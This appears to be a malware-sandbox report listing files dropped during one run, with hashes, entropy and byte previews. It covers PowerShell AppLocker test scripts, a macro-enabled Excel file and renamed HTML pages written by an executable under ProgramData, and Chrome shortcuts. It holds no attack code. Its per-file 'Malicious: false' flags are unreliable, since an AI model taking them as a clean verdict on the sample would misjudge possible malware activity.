SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jg20ctss.2jc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k2clgwy2.pq5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n10qy5fv.ehj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnqu5edh.rpt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmxyqgf1.m1q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyq0zsq1.3ac.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r100n0gb.ote.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5khofed.53k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tef1ooxz.izk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u520obbn.4pn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcebfa14.zwa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjazxxc2.iql.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1z5wwrk.axw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlalyrwz.unl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zll3vjz2.oak.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aQCaWWkc.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\AppData\Local\Temp\iKtvUzw.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.254208035819234
Encrypted:	false
SSDEEP:	24:GgsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
MD5:	0172EAE5077945896BC3CE646D009A86
SHA1:	C83788FCF6766B296EF1420DA13F960CCF541A97
SHA-256:	3D7CD445E8EAC9001E9DBFF656677D2A9467ABD66A2BB3D13187AF2FB076312E
SHA-512:	BDA41178AB265A86D4360B708CEA5B1652698FAEC4C652EF0286FB8B73BF375605A171B72C12285671005C2E848FE24F71C106067B2507DC0CBFB59EE1CBD3C5
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lmfqf4VdZMzfft8ZNZxihw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\wcCeDr4.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.251876524833503
Encrypted:	false
SSDEEP:	24:GgsF+0ZDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W+pAZewRDK4mW
MD5:	2B5833E4D504E6494A5CC7C62BE3726F
SHA1:	6332441C719AF87FE946C3613FC737F615DCAC84
SHA-256:	4C5DD05F15043497F4A95F13D7734B52EFDFD19C660B459D2F56EAD80D0BFF95
SHA-512:	CA7EFAC91824724776F72DE75EBC4C54C801C1626745D4875544BC39C3601C9AA8EA05F9C5593795962F75D0A3F4C1412F3DCF0B230A239CAD395D46DBBAF8E5
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1-4ox4Pwz7v-lKIg_Ohp4A">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\~$aQCaWWkc.xlsm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.3520167401771568
Encrypted:	false
SSDEEP:	3:xvXFz7f:9Xl
MD5:	4B86B2D21B2AC48AD3A1A46FBF1DE4D5
SHA1:	2D695349311A0DAF9B77392C04178F1BD99CCEF2
SHA-256:	22C126EA43AB2F7C80E19E857C50118A3E08A4A98BE31E2ADCFCA88C8E6C5A5D
SHA-512:	FE133E064DAF100FAD21CB4AE44AE573F66A0157A9418538FCE9744B8FB0500478EDE10B9A49E222AA21F14DCB32B384BA1B4D06402D6519EC4E645295F46B76
Malicious:	false
Preview:	.user ..b.r.o.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\~DF7F820D8F57436032.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.746897789531007
Encrypted:	false
SSDEEP:	192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
MD5:	7426F318A20A187D88A6EC88BBB53BAF
SHA1:	4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
SHA-256:	9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
SHA-512:	EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 09:36:38 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9919555056007314
Encrypted:	false
SSDEEP:	48:8p4bdCT4FHhidAKZdA1uehwiZUklqehekJy+3:8p1cO/Yy
MD5:	A98BF21C005265F80CD2632D665D237A
SHA1:	13322740C8459205095BBBF2D7F3CCEDBC4880AA
SHA-256:	84F61244E7049C2D6E53C3932F6DD78CF34861523FB83D39E6D05DFE0E6D2E10
SHA-512:	5C2F5A587C1C3C3ACB31EA575AC1AF579284D4024C56E5028FA0E387E7352D2028D58F896063F26F763E18896CED37CCB0EE83A4FA032EAAC2C2D252BD5856AD
Malicious:	false
Preview:	L..................F.@.. ...$+.,....B....Z......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.Y.T....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.T....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.Y.T....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.Y.T...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.T....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............\|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 09:36:38 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.006618011533504
Encrypted:	false
SSDEEP:	48:8Tg4bdCT4FHhidAKZdA1Heh/iZUkAQkqehvkJy+2:8Tg1cY9Q0Yy
MD5:	CE85A8AC51B51345D6CE1FB1EFAD7E48
SHA1:	FD7D0481BD1E7D4B5CC305C21B3A98FB95DDDA60
SHA-256:	178A700E30E6630F34337628A150D70DEA7817DD4038A443D02A40B7AF681E8E
SHA-512:	85D045CC4B1ED2D7F68D038B5910AE29D6B550C817004212FD9956D8DD2D6949AB8C51A11E6A29E5A1C7DBFEF9504FB31BD54D495DC31AF1C4B0D0EC7E7EEC5D
Malicious:	false
Preview:	L..................F.@.. ...$+.,........Z......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.Y.T....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.T....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.Y.T....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.Y.T...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.T....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............\|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 08:59:33 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.012525533314153
Encrypted:	false
SSDEEP:	48:8F4bdCT4bHhidAKZdA149eh7sFiZUkmgqeh7s9kJy+BX:8F1cunjYy
MD5:	CBBDFE4CFB68B21B06D308431D87F823
SHA1:	EEA5102CAB2CF764992E41A561219EA7A6786E6A
SHA-256:	F02C7439512243CFDC4D5D47A686CEF29395AE1ADCE6BAB6405D511885EB4D10
SHA-512:	DA50B40B83EF780FFD1582184FF7122ADD69BD0004D84B9EED448D5FE7A376B20981634597809B8138CAAEEFB4A4FC13AB7686497BEB34F455AEF823AD7CD229
Malicious:	false
Preview:	L..................F.@.. ...$+.,....K..r.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.Y.T....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.T....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.Y.T....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.Y.T...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VEW.L....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............\|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 30 09:36:38 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.0054937256547385
Encrypted:	false
SSDEEP:	48:8P4bdCT4FHhidAKZdA14ehDiZUkwqehLkJy+R:8P1cTlYy
MD5:	B4D8F5D9DC9DFC906D792003EAD7554D
SHA1:	1442883E27024D206D86C5C7D7F38AB3854F631F
SHA-256:	AFAD720ED63D44A8624A96FB98DC28D6A45D7FE2DF38D2C55DEED2B6110EEBFC
SHA-512:	A98C2F7EAB126DCAB29DAA479767EE924FDE06CAC930C5423666DCC8072A8F32FAA28ABE24D53A3F240D1DB824CEA5FAFC96678505FD3A44DDB1BD4B28AED646
Malicious:	false
Preview:	L..................F.@.. ...$+.,....c...Z......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW$O..PROGRA~1..t......O.I.Y.T....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.T....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.L..Chrome..>......CW.V.Y.T....M......................k..C.h.r.o.m.e.....`.1.....EW.L..APPLIC~1..H......CW.V.Y.T...........................k..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.T....N.......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............\|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. 